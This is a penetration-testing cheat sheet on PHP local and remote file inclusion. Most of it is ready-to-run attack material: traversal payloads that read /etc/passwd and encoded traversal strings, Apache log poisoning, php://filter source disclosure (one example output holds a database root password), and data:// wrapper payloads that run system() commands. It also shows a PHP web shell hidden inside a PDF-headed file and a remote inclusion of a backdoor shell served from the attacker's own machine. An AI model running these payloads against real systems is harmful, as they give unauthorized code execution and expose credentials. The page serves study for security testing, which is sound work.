File Inclusion

Local File Inclusion

http://<RHOST>/<FILE>.php?file=
http://<RHOST>/<FILE>.php?file=../../../../../../../../etc/passwd
http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd

Null Byte

%00
0x00

Encoded Traversal Strings

../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\

Poisoning of apache logs

kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log
...
192.168.50.1 - - [12/Apr/2022:10:34:55 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 2218 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
...

Modify the User Agent and execute php rce

PHP Wrappers

Filter Wrapper

Using php://filter, we can also display the contents of executable files such as .php, rather than executing them.

The PHP wrapper uses resource as the required parameter to specify the file stream for filtering, which is the filename in our case.

http://test.com/meteor/index.php?page=php://filter/resource=admin.php

Let's now encode the output with base64 by adding convert.base64-encode. This converts the specified resource to a base64 string.

http://test.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php

We can now use the base64 program with the -d flag to decode the encoded data in the terminal.

echo "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+CiAgICA8dGl0bGU+TWFpbnRlbmFuY2U8L3RpdGxlPgo8L2hlYWQ+Cjxib2R5PgogICAgICAgIDw/cGhwIGVjaG8gJzxzcGFuIHN0eWxlPSJjb2xvcjojRjAwO3RleHQtYWxpZ246Y2VudGVyOyI+VGhlIGFkbWluIHBhZ2UgaXMgY3VycmVudGx5IHVuZGVyIG1haW50ZW5hbmNlLic7ID8+Cgo8P3BocAokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOwokdXNlcm5hbWUgPSAicm9vdCI7CiRwYXNzd29yZCA9ICJNMDBuSzRrZUNhcmQhMiMiOwoKLy8gQ3JlYXRlIGNvbm5lY3Rpb24KJGNvbm4gPSBuZXcgbXlzcWxpKCRzZXJ2ZXJuYW1lLCAkdXNlcm5hbWUsICRwYXNzd29yZCk7CgovLyBDaGVjayBjb25uZWN0aW9uCmlmICgkY29ubi0+Y29ubmVjdF9lcnJvcikgewogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiAkY29ubi0+Y29ubmVjdF9lcnJvcik7Cn0KZWNobyAiQ29ubmVjdGVkIHN1Y2Nlc3NmdWxseSI7Cj8+Cgo8L2JvZHk+CjwvaHRtbD4K" | base64 -d

Data Wrapper

We can use the data:// wrapper to achieve code execution. This wrapper is used to embed data elements as plaintext or base64-encoded data in the running web application's code.

curl "http://test.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"

When web application firewalls or other security mechanisms are in place, they may filter strings like "system" or other PHP code elements. In such a scenario, we can try to use the data:// wrapper with base64-encoded data.

echo -n '<?php echo system($_GET["cmd"]);?>' | base64

curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"

However, we need to be aware that the data:// wrapper will not work in a default PHP installation. To exploit it, the allow_url_include setting needs to be enabled.

data://text/plain;base64,[command encoded in base64]
or
data://text/plain,<?php shell_exec($_GET['cmd']);?>

File Wrapper

http://localhost/include.php?page=file:///path/to/file.ext

PDF PHP Inclusion

Create a file with a PDF header, which contains PHP code.

%PDF-1.4

<?php
    system($_GET["cmd"]);
?>
http://<RHOST>/index.php?page=uploads/<FILE>.pdf%00&cmd=whoami

Remote File Inclusion (RFI)

While LFI vulnerabilities can be used to include local files, RFI vulnerabilities allow us to include files from a remote system over HTTP or SMB. The included file is also executed in the context of the web application.

Kali Linux includes several PHP webshells in the /usr/share/webshells/php/ directory that can be used for RFI. In this example, we will use the simple-backdoor.php webshell to exploit an RFI vulnerability.

### /usr/share/webshells/php/simple-backdoor.php

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

Start a listener in our machine

python3 -m http.server 80
curl "http://test.com/index.php?page=http://<ip>/simple-backdoor.php&cmd=ls"
PreviousFile UploadNextCross Site Scripting (XSS)

Last updated